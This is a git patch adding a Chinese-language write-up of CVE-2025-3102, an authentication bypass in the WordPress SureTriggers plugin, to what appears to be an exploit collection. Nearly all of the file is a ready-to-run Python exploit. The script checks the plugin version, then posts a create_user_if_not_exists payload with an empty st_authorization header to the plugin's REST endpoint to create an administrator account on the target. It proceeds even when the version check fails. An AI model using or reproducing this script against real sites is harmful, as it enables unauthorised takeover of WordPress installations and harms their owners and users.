From 534388baa8823c28a01ea5301d81391661b75aa0 Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 21 Apr 2025 10:50:11 +0800 Subject: [PATCH] =?UTF-8?q?Create=20WordPress=20SureTriggers=20Plugin?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95?= =?UTF-8?q?=E8=BF=87=E6=BC=8F=E6=B4=9E(CVE-2025-3102).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ugin存在身份验证绕过漏洞(CVE-2025-3102).md | 140 ++++++++++++++++++ 1 file changed, 140 insertions(+) create mode 100644 wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md diff --git a/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md b/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md new file mode 100644 index 0000000..67103ff --- /dev/null +++ b/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md @@ -0,0 +1,140 @@ +## WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102) + +WordPress 的一体化自动化平台插件存在身份验证绕过漏洞,导致创建管理员帐户。该漏洞是由于在 1.0.78 及之前的所有版本中,“autheticate_user”函​​数中“secret_key”值的空值检查缺失所致。 +这使得未经身份验证的攻击者能够在安装并激活该插件但未配置 API 密钥的情况下,在目标网站上创建管理员帐户。 + + +## 漏洞利用python脚本 +```python +import argparse +import requests +import json +import time +import re + + +requests.packages.urllib3.disable_warnings() + + +def display_banner(): + banner = """ + @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@ @@@@@@@@ @@@@@@ +@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@ @@@@@@@@@@ @@@@@@@@ +!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@!! @@! @@@@ @@@ +!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ @!@ +!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ @!@ @!@ @! !@! !!@ +!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !@! !@!!! !!! !!: +:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !:! +:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: + ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::: ::::::: :: :: ::::: + :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : :: : ::: + Exploit By: Nxploited ( Khaled Alenazi ) +""" + print(banner) + + +def fetch_plugin_version(target_url): + try: + readme_url = f"{target_url.rstrip('/')}/wp-content/plugins/suretriggers/readme.txt" + response = requests.get(readme_url, timeout=10, verify=False) + if response.status_code == 200: + match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text) + if match: + return match.group(1) + return None + except requests.RequestException as e: + print(f"[!] Error fetching plugin version: {e}") + return None + + +def is_version_vulnerable(version): + try: + version_parts = list(map(int, version.split("."))) + return version_parts <= [1, 0, 78] + except ValueError: + print("[!] Error parsing version.") + return False + + +def prepare_headers(): + return { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", + "Content-Type": "application/json", + "st_authorization": "" + } + + +def build_payload(email, username, password): + return { + "integration": "WordPress", + "type_event": "create_user_if_not_exists", + "selected_options": { + "user_email": email, + "user_name": username, + "password": password + }, + "fields": [], + "context": {} + } + + +def send_exploit_request(endpoint, headers, payload): + try: + response = requests.post(endpoint, headers=headers, json=payload, timeout=15, verify=False) + return response + except requests.RequestException as e: + print(f"[-] Exploit request failed: {e}") + return None + + +def handle_response(response, username, password): + if not response: + print("[-] No response received.") + return + try: + response_data = response.json() + if response_data.get("success"): + print("[+] Exploit successful!") + print(f"[+] Credentials: {username}:{password}") + else: + print("[-] Exploit failed. Response indicated failure.") + except json.JSONDecodeError: + print("[-] Failed to parse JSON response.") + + +def run_exploit(target_url, email, username, password): + print("[*] Fetching plugin version...") + version = fetch_plugin_version(target_url) + if version: + print(f"[+] Plugin version: {version}") + if is_version_vulnerable(version): + print("[+] Vulnerable version detected. Proceeding with exploit...") + else: + print("[-] Target version is not vulnerable. Attempting exploit anyway...") + else: + print("[-] Could not determine plugin version. Proceeding without version verification.") + + headers = prepare_headers() + payload = build_payload(email, username, password) + endpoint = f"{target_url.rstrip('/')}/wp-json/sure-triggers/v1/automation/action" + response = send_exploit_request(endpoint, headers, payload) + handle_response(response, username, password) + + +def main(): + display_banner() + parser = argparse.ArgumentParser(description="SureTriggers <= 1.0.78 - Authorization Bypass # By: Nxploited | Khaled Alenazi") + parser.add_argument("-u", "--url", required=True, help="Target WordPress base URL") + parser.add_argument("-nmail", "--newmail", default="NxploitBot@gmail.com", help="Email to register") + parser.add_argument("-nu", "--newuser", default="Nxploited", help="Username to register") + parser.add_argument("-np", "--newpassword", default="nxploit123", help="Password for the new user") + args = parser.parse_args() + + run_exploit(args.url, args.newmail, args.newuser, args.newpassword) + + +if __name__ == "__main__": + main() +``` + +<原文>